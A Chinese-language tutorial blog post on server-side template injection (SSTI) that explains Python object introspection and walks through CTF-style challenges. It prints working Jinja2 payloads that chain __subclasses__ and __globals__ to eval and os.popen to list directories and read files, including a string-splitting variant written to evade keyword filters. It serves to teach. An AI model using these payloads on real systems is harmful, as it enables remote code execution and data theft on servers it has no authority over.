注入是什么意思_深入浅出带你了解SSTI模板注入_零基础渗透知识点
持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第10天,点击查看活动详情
引文
上篇文章带来了反序列化漏洞的知识,还没讲过的基础漏洞类型已经很少了,今天给大家带来的知识点是SSTI模板注入,提到注入大家首先想到的肯定是SQL注入,而SSTI模板注入和SQL注入其实也存在着类似的点,接下来就详细给大家讲解一下。
简介
服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、 等问题。
原理
我们先引入一下服务器模板,页面上的数据需要不断更新,即为渲染。我们简单举一个例子:使用 Twig 模版引擎渲染页面,其中模版含有 {{name}}变量,其模版变量值来自于 GET 请求参数 $_GET["name"] ,如果渲染的模版内容受到用户的控制,代码如下:
$twig = new Twig_Environment(new Twig_Loader_String());
$output = $twig->render("Hello {$_GET['name']}"); // 将用户输入作为模版内容的一部分
echo $output;
可以看到上面就是个漏洞点,服务端相信了用户的输出。
SSTI类型
根据模板类型的不同,包裹变量的标识符也大有不同,我们常见的模板引擎有,我们可以根据返回值的类型来判断不同的模板引擎。可以根据下图来进行判断:
基础语法
class:查看变量所属的类,根据前面的变量形式可以得到其所属的类。
>>> ''.__class__
<class 'str'>
>>> ().__class__
<class 'tuple'>
>>> {}.__class__
<class 'dict'>
>>> [].__class__
<class 'list'>
bases:查看类所属的基类
>>> ''.__class__.__bases__
(<class 'object'>,)
>>> ().__class__.__bases__
(<class 'object'>,)
>>> {}.__class__.__bases__
(<class 'object'>,)
>>> [].__class__.__bases__
(<class 'object'>,)
可以看到上面例子,基类都归属于。
:查看当前的子类,格式:
变量.__class__.__bases__[0].__subclasses__()
现在我们拿到了所有继承类的子类的引用,在调用这些子类的方法,去进行我们的模板注入,讲一下利用的前置知识。
init
用于初始化类,意思就是拿到一个类之后要使用之后我们才可以调用里面的函数和属性 。
返回当前位置的全部模块,方法和全局变量,配合着使用 。
内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。
动态加载类和函数,也就是导入模块,用于导入os模块('os').popen('ls').read()]。
例题
学习到现在,我们可以尝试做一个题目来巩固一下:
先查找有没有可用的子类,遍历发现 利用这个子类可以查看目录:
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls /app").read()')
读取.py文件
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("cat /app/server.py").read()')
得到flag。
过滤器
当然真正的题目不可能会这么简单,里面会包含着过滤函数,过滤特殊字符等操作,接下来给大家讲讲过滤器的知识点。
attr
用于获取变量,可用于. [] 都被过滤的情况
join
将一个序列拼接成一个字符串,join ('|')将令每一个元素被'|'隔开
lower
将字符串转换为小写
将变量转换为字符串,可以用符号构造出我们可利用的字符串、符号等。
字符反转
格式化字符串
以上就简单举了点过滤器的例子与用法,当然上面列举的只是一小部分,除了这些还有非常多的过滤器,一一列举是列举不完的
进阶
接下来讲一个有点难度的题带大家加深理解,进去题目发现是一个如下的解码加密网站。
用{{7*7}}加密解密得到49确定存在ssti模板注入,回显是编码的。简单fuzz后发现过滤了flag、、os、eval等关键词。我们构造拆分语句:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eva'+'l' in b.keys() %}
{{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
放到解码区,去解码得到文件目录:
进一步拼接去查看flag就OK了,构造最终:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eva'+'l' in b.keys() %}
{{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
结语
今天比较详细的讲了SSTI模板注入漏洞的原理以及应用方法,可能刚开始学不太好理解,可以根据之前SQL注入的思路去理解一下。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。
网络安全学习路线图(思维导图)
网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。
1. 网络安全视频资料
2. 网络安全笔记/面试题
3. 网安电子书PDF资料
~
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
